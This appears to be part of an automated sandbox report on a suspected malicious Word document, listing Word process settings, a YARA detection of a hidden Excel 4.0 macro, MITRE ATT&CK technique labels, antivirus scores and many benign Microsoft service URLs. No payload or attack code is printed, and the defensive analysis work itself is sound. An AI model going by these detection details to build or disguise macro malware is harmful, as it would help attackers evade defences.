    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: 1118_8732615.doc, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting22Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting22LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    1118_8732615.doc16%VirustotalBrowse
    1118_8732615.doc12%ReversingLabsScript.Trojan.Wacatac
    1118_8732615.doc100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
      high
      https://login.microsoftonline.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
        high
        https://shell.suite.office.com:14433EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
              high
              https://cdn.entity.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                high
                https://wus2-000.contentsync.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                    high
                    https://powerlift.acompli.net3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v13EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                      high
                      https://cortana.ai3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                high
                                https://api.aadrm.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                      high
                                      https://cr.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                            high
                                            https://graph.ppe.windows.net3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                            high
                                                            https://graph.windows.net3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v23EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                                            • Avira URL Cloud: safe
